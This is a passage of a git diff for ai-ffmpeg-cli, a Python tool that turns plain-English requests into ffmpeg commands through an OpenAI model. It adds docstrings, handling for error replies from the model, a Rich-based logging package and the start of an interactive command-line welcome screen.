" • Convert to GIF: action='convert', filters='fps=10,scale=320:-1:flags=lanczos,split[s0][s1];[s0]palettegen[p];[s1][p]paletteuse', video_codec='gif', audio_codec='none'\n"
|
||||
" • Convert to GIF with duration: action='convert', filters='fps=10,scale=320:-1:flags=lanczos,split[s0][s1];[s0]palettegen[p];[s1][p]paletteuse', video_codec='gif', audio_codec='none', duration=5\n"
|
||||
" • 5 second GIF: action='convert', filters='fps=10,scale=320:-1:flags=lanczos,split[s0][s1];[s0]palettegen[p];[s1][p]paletteuse', video_codec='gif', audio_codec='none', duration=5\n"
|
||||
" • 10 second video clip: action='convert', video_codec='libx264', audio_codec='aac', duration=10\n"
|
||||
" • Convert to WebM: action='convert', video_codec='libvpx-vp9', audio_codec='libopus'\n"
|
||||
" • Burn subtitles: add ',subtitles=/abs/path.srt' at the end of the chain.\n"
|
||||
"\n"
|
||||
"Final instruction:\n"
|
||||
" • Return ONLY the JSON object for FfmpegIntent (or the JSON error). No prose, no code fences."
|
||||
)
|
||||
|
||||
|
||||
class LLMProvider:
|
||||
"""Abstract base class for LLM providers.
|
||||
|
||||
Defines the interface that all LLM providers must implement
|
||||
for natural language to intent parsing.
|
||||
"""
|
||||
|
||||
def complete(self, system: str, user: str, timeout: int) -> str: # pragma: no cover - interface
|
||||
"""Complete a chat request with the LLM.
|
||||
|
||||
Args:
|
||||
system: System prompt defining the task
|
||||
user: User message to process
|
||||
timeout: Request timeout in seconds
|
||||
|
||||
Returns:
|
||||
Raw response from the LLM
|
||||
|
||||
Raises:
|
||||
NotImplementedError: Must be implemented by subclasses
|
||||
"""
|
||||
raise NotImplementedError
|
||||
|
||||
|
||||
class OpenAIProvider(LLMProvider):
|
||||
"""OpenAI API provider implementation.
|
||||
|
||||
Handles communication with OpenAI's chat completion API,
|
||||
including error handling and response processing.
|
||||
"""
|
||||
|
||||
def __init__(self, api_key: str, model: str) -> None:
|
||||
"""Initialize OpenAI provider with API key and model.
|
||||
|
||||
Args:
|
||||
api_key: OpenAI API key for authentication
|
||||
model: Model name to use for completions
|
||||
|
||||
Raises:
|
||||
Exception: When client initialization fails
|
||||
"""
|
||||
from openai import OpenAI # lazy import for testability
|
||||
|
||||
# Never log the actual API key
|
||||
@@ -45,7 +180,22 @@ class OpenAIProvider(LLMProvider):
|
||||
raise
|
||||
|
||||
def complete(self, system: str, user: str, timeout: int) -> str:
|
||||
"""Complete chat request with error handling and retries."""
|
||||
"""Complete chat request with error handling and retries.
|
||||
|
||||
Sends a chat completion request to OpenAI with comprehensive
|
||||
error handling for various failure scenarios.
|
||||
|
||||
Args:
|
||||
system: System prompt defining the task
|
||||
user: User message to process
|
||||
timeout: Request timeout in seconds
|
||||
|
||||
Returns:
|
||||
Raw response content from OpenAI
|
||||
|
||||
Raises:
|
||||
ParseError: When the request fails with specific error details
|
||||
"""
|
||||
try:
|
||||
logger.debug(f"Making OpenAI API request with model: {self.model}, timeout: {timeout}s")
|
||||
|
||||
@@ -55,8 +205,7 @@ class OpenAIProvider(LLMProvider):
|
||||
{"role": "system", "content": system},
|
||||
{"role": "user", "content": user},
|
||||
],
|
||||
temperature=0,
|
||||
response_format={"type": "json_object"},
|
||||
response_format={"type": "json_object"}, # Ensure JSON response
|
||||
timeout=timeout,
|
||||
)
|
||||
|
||||
@@ -116,7 +265,18 @@ class OpenAIProvider(LLMProvider):
|
||||
|
||||
|
||||
class LLMClient:
|
||||
"""High-level LLM client for parsing natural language into ffmpeg intents.
|
||||
|
||||
Provides a unified interface for natural language processing with
|
||||
retry logic, error handling, and response validation.
|
||||
"""
|
||||
|
||||
def __init__(self, provider: LLMProvider) -> None:
|
||||
"""Initialize LLM client with a provider.
|
||||
|
||||
Args:
|
||||
provider: LLM provider instance to use for completions
|
||||
"""
|
||||
self.provider = provider
|
||||
|
||||
def parse(
|
||||
@@ -124,19 +284,24 @@ class LLMClient:
|
||||
) -> FfmpegIntent:
|
||||
"""Parse natural language prompt into FfmpegIntent with retry logic.
|
||||
|
||||
Processes a natural language prompt through the LLM to generate
|
||||
a structured ffmpeg intent. Includes input sanitization, prompt
|
||||
enhancement, and retry logic for failed parsing attempts.
|
||||
|
||||
Args:
|
||||
nl_prompt: Natural language prompt from user
|
||||
context: File context information
|
||||
timeout: Request timeout in seconds
|
||||
context: File context information containing available files
|
||||
timeout: Request timeout in seconds (defaults to 60)
|
||||
|
||||
Returns:
|
||||
FfmpegIntent: Parsed intent object
|
||||
FfmpegIntent: Parsed and validated intent object
|
||||
|
||||
Raises:
|
||||
ParseError: If parsing fails after retry attempts
|
||||
ParseError: If parsing fails after retry attempts or validation errors
|
||||
"""
|
||||
# Sanitize user input first
|
||||
from .io_utils import sanitize_user_input
|
||||
# Sanitize user input first to prevent injection attacks
|
||||
from .file_operations import sanitize_user_input
|
||||
from .prompt_enhancer import enhance_user_prompt
|
||||
|
||||
sanitized_prompt = sanitize_user_input(nl_prompt)
|
||||
|
||||
@@ -145,17 +310,47 @@ class LLMClient:
|
||||
"Empty or invalid prompt provided. Please provide a clear description of what you want to do."
|
||||
)
|
||||
|
||||
user_payload = json.dumps({"prompt": sanitized_prompt, "context": context})
|
||||
# Enhance the prompt for better LLM understanding using context
|
||||
enhanced_prompt = enhance_user_prompt(sanitized_prompt, context)
|
||||
|
||||
# Log the enhancement for debugging
|
||||
if enhanced_prompt != sanitized_prompt:
|
||||
logger.debug(f"Enhanced prompt: '{sanitized_prompt}' -> '{enhanced_prompt}'")
|
||||
|
||||
# Prepare user payload with prompt and context
|
||||
user_payload = json.dumps({"prompt": enhanced_prompt, "context": context})
|
||||
effective_timeout = 60 if timeout is None else timeout
|
||||
|
||||
logger.debug(f"Parsing prompt with timeout: {effective_timeout}s")
|
||||
|
||||
# First attempt
|
||||
# First attempt at parsing
|
||||
try:
|
||||
raw = self.provider.complete(SYSTEM_PROMPT, user_payload, timeout=effective_timeout)
|
||||
logger.debug(f"Received raw response: {len(raw)} chars")
|
||||
|
||||
data = json.loads(raw)
|
||||
|
||||
# Check if the response is an error JSON from the AI
|
||||
if isinstance(data, dict) and "error" in data:
|
||||
error_type = data.get("error", "unknown_error")
|
||||
error_message = data.get("message", "Unknown error")
|
||||
|
||||
if error_type == "missing_input":
|
||||
raise ParseError(
|
||||
f"Input file not found: {error_message}. "
|
||||
"Please ensure the file exists in the current directory and try again."
|
||||
)
|
||||
elif error_type == "unsupported_action":
|
||||
raise ParseError(
|
||||
f"Unsupported operation: {error_message}. "
|
||||
"Please check the supported actions and try a different approach."
|
||||
)
|
||||
else:
|
||||
raise ParseError(
|
||||
f"AI model error: {error_message}. "
|
||||
"Please try rephrasing your request or check if the operation is supported."
|
||||
)
|
||||
|
||||
intent = FfmpegIntent.model_validate(data)
|
||||
logger.debug(f"Successfully parsed intent: {intent.action}")
|
||||
return intent
|
||||
@@ -179,6 +374,28 @@ class LLMClient:
|
||||
)
|
||||
|
||||
data2 = json.loads(raw2)
|
||||
|
||||
# Check if the retry response is an error JSON from the AI
|
||||
if isinstance(data2, dict) and "error" in data2:
|
||||
error_type = data2.get("error", "unknown_error")
|
||||
error_message = data2.get("message", "Unknown error")
|
||||
|
||||
if error_type == "missing_input":
|
||||
raise ParseError(
|
||||
f"Input file not found: {error_message}. "
|
||||
"Please ensure the file exists in the current directory and try again."
|
||||
)
|
||||
elif error_type == "unsupported_action":
|
||||
raise ParseError(
|
||||
f"Unsupported operation: {error_message}. "
|
||||
"Please check the supported actions and try a different approach."
|
||||
)
|
||||
else:
|
||||
raise ParseError(
|
||||
f"AI model error: {error_message}. "
|
||||
"Please try rephrasing your request or check if the operation is supported."
|
||||
)
|
||||
|
||||
intent2 = FfmpegIntent.model_validate(data2)
|
||||
logger.debug(f"Successfully parsed intent on retry: {intent2.action}")
|
||||
return intent2
|
||||
@@ -213,3 +430,29 @@ class LLMClient:
|
||||
f"Network error during LLM request: {io_err}. "
|
||||
"Please check your internet connection and try again."
|
||||
) from io_err
|
||||
|
||||
def _fix_common_issues(self, response: str) -> str:
|
||||
"""Fix common issues in LLM responses before parsing.
|
||||
|
||||
Applies regex-based fixes to common JSON formatting issues
|
||||
that LLMs sometimes produce.
|
||||
|
||||
Args:
|
||||
response: Raw JSON response from LLM
|
||||
|
||||
Returns:
|
||||
str: Fixed JSON response with corrected formatting
|
||||
"""
|
||||
import re
|
||||
|
||||
# Fix null values for array fields that should be empty arrays
|
||||
response = re.sub(r'"filters":\s*null', '"filters": []', response)
|
||||
response = re.sub(r'"extra_flags":\s*null', '"extra_flags": []', response)
|
||||
response = re.sub(r'"inputs":\s*null', '"inputs": []', response)
|
||||
|
||||
# Fix missing array brackets for single values
|
||||
# Match patterns like "filters": "value" and convert to "filters": ["value"]
|
||||
response = re.sub(r'"filters":\s*"([^"]+)"', r'"filters": ["\1"]', response)
|
||||
response = re.sub(r'"extra_flags":\s*"([^"]+)"', r'"extra_flags": ["\1"]', response)
|
||||
|
||||
return response
|
||||
|
||||
31
src/ai_ffmpeg_cli/logging_config/__init__.py
Normal file
31
src/ai_ffmpeg_cli/logging_config/__init__.py
Normal file
@@ -0,0 +1,31 @@
|
||||
"""Rich-based logging configuration for ai-ffmpeg-cli.
|
||||
|
||||
This module provides a comprehensive logging setup using Rich for beautiful console output
|
||||
and flexible file logging for production environments.
|
||||
"""
|
||||
|
||||
from .config import JsonFormatter
|
||||
from .config import get_logger
|
||||
from .config import setup_logging
|
||||
from .context import LogContext
|
||||
from .context import bind_context
|
||||
from .context import clear_context
|
||||
from .context import get_context
|
||||
from .context import request_id
|
||||
from .context import tenant_id
|
||||
from .context import user_id
|
||||
|
||||
__all__ = [
|
||||
"setup_logging",
|
||||
"get_logger",
|
||||
"JsonFormatter",
|
||||
"bind_context",
|
||||
"clear_context",
|
||||
"get_context",
|
||||
"LogContext",
|
||||
"request_id",
|
||||
"user_id",
|
||||
"tenant_id",
|
||||
]
|
||||
|
||||
__version__ = "0.2.3"
|
||||
281
src/ai_ffmpeg_cli/logging_config/config.py
Normal file
281
src/ai_ffmpeg_cli/logging_config/config.py
Normal file
@@ -0,0 +1,281 @@
|
||||
"""Rich-based logging configuration for ai-ffmpeg-cli."""
|
||||
|
||||
import json
|
||||
import logging
|
||||
import logging.handlers
|
||||
import os
|
||||
import sys
|
||||
from pathlib import Path
|
||||
from typing import Any
|
||||
|
||||
from rich.console import Console
|
||||
from rich.logging import RichHandler
|
||||
from rich.theme import Theme
|
||||
from rich.traceback import install as install_rich_traceback
|
||||
|
||||
from .context import get_context
|
||||
|
||||
# Create a custom theme for better visual consistency
|
||||
custom_theme = Theme(
|
||||
{
|
||||
"info": "cyan",
|
||||
"warning": "yellow",
|
||||
"error": "red",
|
||||
"critical": "red bold",
|
||||
"debug": "dim",
|
||||
"success": "green",
|
||||
"progress": "blue",
|
||||
}
|
||||
)
|
||||
|
||||
# Initialize console with custom theme
|
||||
console = Console(theme=custom_theme)
|
||||
|
||||
|
||||
def setup_logging(
|
||||
level: str | int | None = None,
|
||||
json_output: bool = False,
|
||||
log_file: str | Path | None = None,
|
||||
show_locals: bool = True,
|
||||
console_instance: Console | None = None,
|
||||
) -> None:
|
||||
"""Setup Rich-based logging configuration.
|
||||
|
||||
Args:
|
||||
level: Logging level (default: INFO, or LOG_LEVEL env var)
|
||||
json_output: Use JSON format for file logs (default: False)
|
||||
log_file: Path to log file (default: None)
|
||||
show_locals: Show local variables in tracebacks (default: True)
|
||||
console_instance: Rich console instance (default: creates new one)
|
||||
|
||||
This function is idempotent - calling it multiple times won't duplicate handlers.
|
||||
"""
|
||||
# Get log level from env var or use default
|
||||
if level is None:
|
||||
level = os.getenv("LOG_LEVEL", "INFO")
|
||||
|
||||
# Convert string level to int if needed
|
||||
if isinstance(level, str):
|
||||
level = getattr(logging, level.upper(), logging.INFO)
|
||||
|
||||
# Install Rich traceback handler
|
||||
install_rich_traceback(show_locals=show_locals)
|
||||
|
||||
# Use provided console or create new one
|
||||
rich_console = console_instance or console
|
||||
|
||||
# Get root logger
|
||||
root_logger = logging.getLogger()
|
||||
|
||||
# Clear existing handlers to ensure idempotency
|
||||
root_logger.handlers.clear()
|
||||
|
||||
# Create Rich console handler with enhanced formatting
|
||||
rich_handler = RichHandler(
|
||||
console=rich_console,
|
||||
show_time=True,
|
||||
show_path=False, # Don't show file paths and line numbers
|
||||
markup=True,
|
||||
rich_tracebacks=True,
|
||||
tracebacks_show_locals=show_locals,
|
||||
show_level=True,
|
||||
level=level,
|
||||
log_time_format="[%X]",
|
||||
)
|
||||
rich_handler.setLevel(level)
|
||||
|
||||
# Set root logger level
|
||||
root_logger.setLevel(level)
|
||||
|
||||
# Create formatter for Rich handler
|
||||
rich_formatter = logging.Formatter(
|
||||
fmt="%(message)s",
|
||||
datefmt="[%X]",
|
||||
)
|
||||
rich_handler.setFormatter(rich_formatter)
|
||||
|
||||
# Add Rich handler to root logger
|
||||
root_logger.addHandler(rich_handler)
|
||||
|
||||
# Setup file logging if log_file is specified
|
||||
if log_file:
|
||||
log_path = Path(log_file)
|
||||
log_path.parent.mkdir(parents=True, exist_ok=True)
|
||||
|
||||
if json_output:
|
||||
# JSON file handler
|
||||
file_handler = logging.handlers.RotatingFileHandler(
|
||||
log_path,
|
||||
maxBytes=10 * 1024 * 1024, # 10MB
|
||||
backupCount=5,
|
||||
encoding="utf-8",
|
||||
)
|
||||
file_handler.setFormatter(JsonFormatter())
|
||||
else:
|
||||
# Plain text file handler
|
||||
file_handler = logging.handlers.RotatingFileHandler(
|
||||
log_path,
|
||||
maxBytes=10 * 1024 * 1024, # 10MB
|
||||
backupCount=5,
|
||||
encoding="utf-8",
|
||||
)
|
||||
file_handler.setFormatter(
|
||||
logging.Formatter(
|
||||
fmt="%(asctime)s - %(name)s - %(levelname)s - %(message)s",
|
||||
datefmt="%Y-%m-%d %H:%M:%S",
|
||||
)
|
||||
)
|
||||
|
||||
file_handler.setLevel(level)
|
||||
root_logger.addHandler(file_handler)
|
||||
|
||||
# Capture warnings in logs
|
||||
logging.captureWarnings(True)
|
||||
|
||||
# Silence noisy libraries
|
||||
_silence_noisy_libraries()
|
||||
|
||||
# Log setup completion with enhanced formatting
|
||||
logger = logging.getLogger(__name__)
|
||||
logger.info(
|
||||
"ai-ffmpeg-cli logging initialized",
|
||||
extra={
|
||||
"level": logging.getLevelName(level),
|
||||
"log_file": str(log_file) if log_file else "console only",
|
||||
"rich_tracebacks": True,
|
||||
"show_locals": show_locals,
|
||||
},
|
||||
)
|
||||
|
||||
|
||||
def _silence_noisy_libraries() -> None:
|
||||
"""Silence noisy third-party libraries to WARNING level."""
|
||||
noisy_libraries = [
|
||||
"urllib3",
|
||||
"botocore",
|
||||
"boto3",
|
||||
"requests",
|
||||
"httpx",
|
||||
"aiohttp",
|
||||
"asyncio",
|
||||
"charset_normalizer",
|
||||
"certifi",
|
||||
]
|
||||
|
||||
for lib in noisy_libraries:
|
||||
logging.getLogger(lib).setLevel(logging.WARNING)
|
||||
|
||||
|
||||
class JsonFormatter(logging.Formatter):
|
||||
"""JSON formatter for structured logging."""
|
||||
|
||||
def format(self, record: logging.LogRecord) -> str:
|
||||
"""Format log record as JSON."""
|
||||
# Get context data
|
||||
context_data = get_context()
|
||||
|
||||
# Prepare log entry
|
||||
log_entry = {
|
||||
"timestamp": self.formatTime(record),
|
||||
"level": record.levelname,
|
||||
"logger": record.name,
|
||||
"message": record.getMessage(),
|
||||
"module": record.module,
|
||||
"function": record.funcName,
|
||||
"line": record.lineno,
|
||||
}
|
||||
|
||||
# Add context data if available
|
||||
if context_data:
|
||||
log_entry["context"] = context_data
|
||||
|
||||
# Add exception info if present
|
||||
if record.exc_info and record.exc_info != (None, None, None):
|
||||
log_entry["exception"] = self.formatException(record.exc_info)
|
||||
|
||||
# Add extra fields
|
||||
for key, value in record.__dict__.items():
|
||||
if key not in log_entry and not key.startswith("_"):
|
||||
log_entry[key] = value
|
||||
|
||||
return json.dumps(log_entry, ensure_ascii=False, default=str)
|
||||
|
||||
|
||||
def get_logger(name: str) -> logging.Logger:
|
||||
"""Get a logger with the given name.
|
||||
|
||||
Args:
|
||||
name: Logger name (usually __name__)
|
||||
|
||||
Returns:
|
||||
Configured logger instance
|
||||
"""
|
||||
return logging.getLogger(name)
|
||||
|
||||
|
||||
def log_startup_info() -> None:
|
||||
"""Log startup information with Rich formatting."""
|
||||
logger = get_logger(__name__)
|
||||
|
||||
# Log system information
|
||||
logger.info(
|
||||
"Starting ai-ffmpeg-cli",
|
||||
extra={
|
||||
"python_version": f"{sys.version_info.major}.{sys.version_info.minor}.{sys.version_info.micro}",
|
||||
"platform": sys.platform,
|
||||
"working_directory": str(Path.cwd()),
|
||||
},
|
||||
)
|
||||
|
||||
# Log configuration status
|
||||
api_key_configured = bool(os.getenv("OPENAI_API_KEY"))
|
||||
logger.info(
|
||||
"Configuration status",
|
||||
extra={
|
||||
"api_key_configured": api_key_configured,
|
||||
"log_level": os.getenv("LOG_LEVEL", "INFO"),
|
||||
"model": os.getenv("AICLIP_MODEL", "gpt-5"),
|
||||
},
|
||||
)
|
||||
|
||||
|
||||
def log_operation_start(operation: str, **kwargs: Any) -> None:
|
||||
"""Log the start of an operation with Rich formatting.
|
||||
|
||||
Args:
|
||||
operation: Name of the operation
|
||||
**kwargs: Additional context information
|
||||
"""
|
||||
logger = get_logger(__name__)
|
||||
logger.info(f"Starting operation: {operation}", extra=kwargs)
|
||||
|
||||
|
||||
def log_operation_success(operation: str, **kwargs: Any) -> None:
|
||||
"""Log successful completion of an operation with Rich formatting.
|
||||
|
||||
Args:
|
||||
operation: Name of the operation
|
||||
**kwargs: Additional context information
|
||||
"""
|
||||
logger = get_logger(__name__)
|
||||
logger.info(f"Operation completed: {operation}", extra=kwargs)
|
||||
|
||||
|
||||
def log_operation_error(operation: str, error: Exception, **kwargs: Any) -> None:
|
||||
"""Log an operation error with Rich formatting.
|
||||
|
||||
Args:
|
||||
operation: Name of the operation
|
||||
error: The error that occurred
|
||||
**kwargs: Additional context information
|
||||
"""
|
||||
logger = get_logger(__name__)
|
||||
logger.error(
|
||||
f"Operation failed: {operation}",
|
||||
extra={
|
||||
"error_type": type(error).__name__,
|
||||
"error_message": str(error),
|
||||
**kwargs,
|
||||
},
|
||||
exc_info=True,
|
||||
)
|
||||
155
src/ai_ffmpeg_cli/logging_config/context.py
Normal file
155
src/ai_ffmpeg_cli/logging_config/context.py
Normal file
@@ -0,0 +1,155 @@
|
||||
"""Contextual logging support using contextvars."""
|
||||
|
||||
import contextvars
|
||||
from typing import Any
|
||||
|
||||
# Context variables for logging
|
||||
_request_id: contextvars.ContextVar[str | None] = contextvars.ContextVar("request_id", default=None)
|
||||
_user_id: contextvars.ContextVar[str | None] = contextvars.ContextVar("user_id", default=None)
|
||||
_tenant_id: contextvars.ContextVar[str | None] = contextvars.ContextVar("tenant_id", default=None)
|
||||
_custom_context: contextvars.ContextVar[dict[str, Any] | None] = contextvars.ContextVar(
|
||||
"custom_context", default=None
|
||||
)
|
||||
|
||||
|
||||
class LogContext:
|
||||
"""Context manager for binding logging context."""
|
||||
|
||||
def __init__(self, **kwargs: Any) -> None:
|
||||
"""Initialize context with key-value pairs.
|
||||
|
||||
Args:
|
||||
**kwargs: Context variables to bind
|
||||
"""
|
||||
self.context_data = kwargs
|
||||
self._tokens: dict[str, contextvars.Token] = {}
|
||||
|
||||
def __enter__(self) -> "LogContext":
|
||||
"""Bind context variables."""
|
||||
for key, value in self.context_data.items():
|
||||
if key == "request_id":
|
||||
self._tokens[key] = _request_id.set(value)
|
||||
elif key == "user_id":
|
||||
self._tokens[key] = _user_id.set(value)
|
||||
elif key == "tenant_id":
|
||||
self._tokens[key] = _tenant_id.set(value)
|
||||
else:
|
||||
# Store custom context
|
||||
current_context = _custom_context.get() or {}
|
||||
current_context = current_context.copy()
|
||||
current_context[key] = value
|
||||
self._tokens[f"custom_{key}"] = _custom_context.set(current_context)
|
||||
return self
|
||||
|
||||
def __exit__(self, exc_type: Any, exc_val: Any, exc_tb: Any) -> None:
|
||||
"""Restore context variables."""
|
||||
for key, token in self._tokens.items():
|
||||
if key.startswith("custom_"):
|
||||
_custom_context.reset(token)
|
||||
elif key == "request_id":
|
||||
_request_id.reset(token)
|
||||
elif key == "user_id":
|
||||
_user_id.reset(token)
|
||||
elif key == "tenant_id":
|
||||
_tenant_id.reset(token)
|
||||
|
||||
|
||||
def bind_context(**kwargs: Any) -> LogContext:
|
||||
"""Create a context manager for binding logging context.
|
||||
|
||||
Args:
|
||||
**kwargs: Context variables to bind
|
||||
|
||||
Returns:
|
||||
LogContext instance that can be used as a context manager
|
||||
|
||||
Example:
|
||||
with bind_context(request_id="req-123", user_id="user-456"):
|
||||
logger.info("Processing request")
|
||||
"""
|
||||
return LogContext(**kwargs)
|
||||
|
||||
|
||||
def clear_context() -> None:
|
||||
"""Clear all context variables."""
|
||||
_request_id.set(None)
|
||||
_user_id.set(None)
|
||||
_tenant_id.set(None)
|
||||
_custom_context.set(None)
|
||||
|
||||
|
||||
def get_context() -> dict[str, Any]:
|
||||
"""Get current context data.
|
||||
|
||||
Returns:
|
||||
Dictionary containing current context variables
|
||||
"""
|
||||
context = {}
|
||||
|
||||
# Add standard context variables if set
|
||||
request_id_val = _request_id.get()
|
||||
if request_id_val is not None:
|
||||
context["request_id"] = request_id_val
|
||||
|
||||
user_id_val = _user_id.get()
|
||||
if user_id_val is not None:
|
||||
context["user_id"] = user_id_val
|
||||
|
||||
tenant_id_val = _tenant_id.get()
|
||||
if tenant_id_val is not None:
|
||||
context["tenant_id"] = tenant_id_val
|
||||
|
||||
# Add custom context
|
||||
custom_context = _custom_context.get()
|
||||
if custom_context:
|
||||
context.update(custom_context)
|
||||
|
||||
return context
|
||||
|
||||
|
||||
def request_id(value: str) -> LogContext:
|
||||
"""Create a context manager that binds request_id.
|
||||
|
||||
Args:
|
||||
value: Request ID value
|
||||
|
||||
Returns:
|
||||
LogContext instance
|
||||
|
||||
Example:
|
||||
with request_id("req-123"):
|
||||
logger.info("Processing request")
|
||||
"""
|
||||
return LogContext(request_id=value)
|
||||
|
||||
|
||||
def user_id(value: str) -> LogContext:
|
||||
"""Create a context manager that binds user_id.
|
||||
|
||||
Args:
|
||||
value: User ID value
|
||||
|
||||
Returns:
|
||||
LogContext instance
|
||||
|
||||
Example:
|
||||
with user_id("user-456"):
|
||||
logger.info("User action")
|
||||
"""
|
||||
return LogContext(user_id=value)
|
||||
|
||||
|
||||
def tenant_id(value: str) -> LogContext:
|
||||
"""Create a context manager that binds tenant_id.
|
||||
|
||||
Args:
|
||||
value: Tenant ID value
|
||||
|
||||
Returns:
|
||||
LogContext instance
|
||||
|
||||
Example:
|
||||
with tenant_id("tenant-789"):
|
||||
logger.info("Tenant operation")
|
||||
"""
|
||||
return LogContext(tenant_id=value)
|
||||
@@ -1,29 +1,272 @@
|
||||
"""Main entry point for the ai-ffmpeg-cli application.
|
||||
|
||||
This module provides the CLI interface using Typer, handling both one-shot
|
||||
commands and interactive mode for natural language to ffmpeg command conversion.
|
||||
"""
|
||||
|
||||
from __future__ import annotations
|
||||
|
||||
import logging
|
||||
import platform
|
||||
import sys
|
||||
from datetime import datetime
|
||||
from pathlib import Path
|
||||
|
||||
import typer
|
||||
from rich import print as rprint
|
||||
from rich.console import Console
|
||||
from rich.panel import Panel
|
||||
from rich.table import Table
|
||||
from rich.text import Text
|
||||
|
||||
from .command_builder import build_commands
|
||||
from .config import AppConfig
|
||||
from .config import load_config
|
||||
from .confirm import confirm_prompt
|
||||
from .context_scanner import scan
|
||||
from .errors import BuildError
|
||||
from .errors import ConfigError
|
||||
from .errors import ExecError
|
||||
from .errors import ParseError
|
||||
from .context_scanner_basic import scan
|
||||
from .custom_exceptions import BuildError
|
||||
from .custom_exceptions import ConfigError
|
||||
from .custom_exceptions import ExecError
|
||||
from .custom_exceptions import ParseError
|
||||
from .intent_router import route_intent
|
||||
from .llm_client import LLMClient
|
||||
from .llm_client import OpenAIProvider
|
||||
from .version_info import __version__
|
||||
|
||||
# Initialize console for Rich output
|
||||
console = Console()
|
||||
|
||||
# Initialize Typer app with completion disabled and support for invocation without subcommands
|
||||
app = typer.Typer(add_completion=False, help="AI-powered ffmpeg CLI", invoke_without_command=True)
|
||||
|
||||
|
||||
def _display_welcome_screen() -> None:
|
||||
"""Display a beautiful welcome screen for the interactive mode."""
|
||||
# Create welcome panel
|
||||
welcome_text = Text()
|
||||
welcome_text.append("ai-ffmpeg-cli", style="bold white")
|
||||
welcome_text.append(" v", style="dim")
|
||||
welcome_text.append(__version__, style="bold green")
|
||||
welcome_text.append("\n\n", style="dim")
|
||||
welcome_text.append(
|
||||
"AI-powered video and audio processing with natural language", style="italic"
|
||||
)
|
||||
welcome_text.append("\n", style="dim")
|
||||
welcome_text.append(
|
||||
"Type your request in plain English and let AI handle the ffmpeg complexity!",
|
||||
style="dim",
|
||||
)
|
||||
|
||||
welcome_panel = Panel(
|
||||
welcome_text,
|
||||
title="[bold cyan]Welcome to Interactive Mode[/bold cyan]",
|
||||
border_style="blue",
|
||||
padding=(1, 2),
|
||||
)
|
||||
|
||||
console.print(welcome_panel)
|
||||
console.print()
|
||||
|
||||
|
||||
def _display_system_info() -> None:
|
||||
"""Display system information in a table format."""
|
||||
table = Table(title="[bold cyan]System Information[/bold cyan]", show_header=False, box=None)
|
||||
table.add_column("Property", style="bold blue")
|
||||
table.add_column("Value", style="white")
|
||||
|
||||
table.add_row(
|
||||
"Python Version",
|
||||
f"{sys.version_info.major}.{sys.version_info.minor}.{sys.version_info.micro}",
|
||||
)
|
||||
table.add_row("Platform", platform.platform())
|
||||
table.add_row("CLI Version", __version__)
|
||||
table.add_row("Start Time", datetime.now().strftime("%Y-%m-%d %H:%M:%S"))
|
||||
|
||||
console.print(table)
|
||||
console.print()
|
||||
|
||||
|
||||
def _display_context_info(context: dict, output_dir: Path | None = None) -> None:
|
||||
"""Display context information in a beautiful table format."""
|
||||
if not context:
|
||||
return
|
||||
|
||||
# Create context table
|
||||
table = Table(title="[bold green]Available Media Files[/bold green]", show_header=True)
|
||||
table.add_column("Type", style="bold cyan", justify="center")
|
||||
table.add_column("Count", style="bold green", justify="center")
|
||||
table.add_column("Files", style="white")
|
||||
|
||||
# Add video files
|
||||
videos = context.get("videos", [])
|
||||
if videos:
|
||||
video_files = "\n".join([f"• {Path(v).name}" for v in videos[:5]]) # Show first 5
|
||||
if len(videos) > 5:
|
||||
video_files += f"\n• ... and {len(videos) - 5} more"
|
||||
table.add_row("Videos", str(len(videos)), video_files)
|
||||
|
||||
# Add audio files
|
||||
audios = context.get("audios", [])
|
||||
if audios:
|
||||
audio_files = "\n".join([f"• {Path(a).name}" for a in audios[:5]]) # Show first 5
|
||||
if len(audios) > 5:
|
||||
audio_files += f"\n• ... and {len(audios) - 5} more"
|
||||
table.add_row("Audio", str(len(audios)), audio_files)
|
||||
|
||||
# Add image files
|
||||
images = context.get("images", [])
|
||||
if images:
|
||||
image_files = "\n".join([f"• {Path(i).name}" for i in images[:5]]) # Show first 5
|
||||
if len(images) > 5:
|
||||
image_files += f"\n• ... and {len(images) - 5} more"
|
||||
table.add_row("Images", str(len(images)), image_files)
|
||||
|
||||
# Show most recent video if available
|
||||
most_recent = context.get("most_recent_video")
|
||||
if most_recent:
|
||||
table.add_row("Recent", "1", f"• {Path(most_recent).name}")
|
||||
|
||||
if table.row_count > 0:
|
||||
console.print(table)
|
||||
console.print()
|
||||
|
||||
# Show output directory information if provided
|
||||
if output_dir:
|
||||
output_info = Panel(
|
||||
f"[bold]Output Directory:[/bold] {output_dir}\n"
|
||||
f"[dim]Generated files will be saved here[/dim]",
|
||||
title="[bold blue]Output Configuration[/bold blue]",
|
||||
border_style="blue",
|
||||
)
|
||||
console.print(output_info)
|
||||
console.print()
|
||||
|
||||
|
||||
def _display_completion_summary(output_dir: Path | None = None) -> None:
|
||||
"""Display a summary of available media files after completion."""
|
||||
if not output_dir:
|
||||
return
|
||||
|
||||
try:
|
||||
# Scan the output directory for new media files
|
||||
from .context_scanner_basic import scan
|
||||
|
||||
# Create a temporary context for the output directory
|
||||
output_context = scan(cwd=output_dir, show_summary=False)
|
||||
|
||||
if not output_context:
|
||||
return
|
||||
|
||||
# Create completion summary table
|
||||
completion_table = Table(
|
||||
title="[bold green]Generated Output Files[/bold green]", show_header=True
|
||||
)
|
||||
completion_table.add_column("Type", style="bold cyan", justify="center")
|
||||
completion_table.add_column("Count", style="bold green", justify="center")
|
||||
completion_table.add_column("Files", style="white")
|
||||
|
||||
# Add generated video files
|
||||
videos = output_context.get("videos", [])
|
||||
if videos and isinstance(videos, list):
|
||||
video_files = "\n".join([f"• {Path(str(v)).name}" for v in videos[:5]])
|
||||
if len(videos) > 5:
|
||||
video_files += f"\n• ... and {len(videos) - 5} more"
|
||||
completion_table.add_row("Videos", str(len(videos)), video_files)
|
||||
|
||||
# Add generated audio files
|
||||
audios = output_context.get("audios", [])
|
||||
if audios and isinstance(audios, list):
|
||||
audio_files = "\n".join([f"• {Path(str(a)).name}" for a in audios[:5]])
|
||||
if len(audios) > 5:
|
||||
audio_files += f"\n• ... and {len(audios) - 5} more"
|
||||
completion_table.add_row("Audio", str(len(audios)), audio_files)
|
||||
|
||||
# Add generated image files
|
||||
images = output_context.get("images", [])
|
||||
if images and isinstance(images, list):
|
||||
image_files = "\n".join([f"• {Path(str(i)).name}" for i in images[:5]])
|
||||
if len(images) > 5:
|
||||
image_files += f"\n• ... and {len(images) - 5} more"
|
||||
completion_table.add_row("Images", str(len(images)), image_files)
|
||||
|
||||
if completion_table.row_count > 0:
|
||||
console.print(completion_table)
|
||||
console.print()
|
||||
|
||||
except Exception:
|
||||
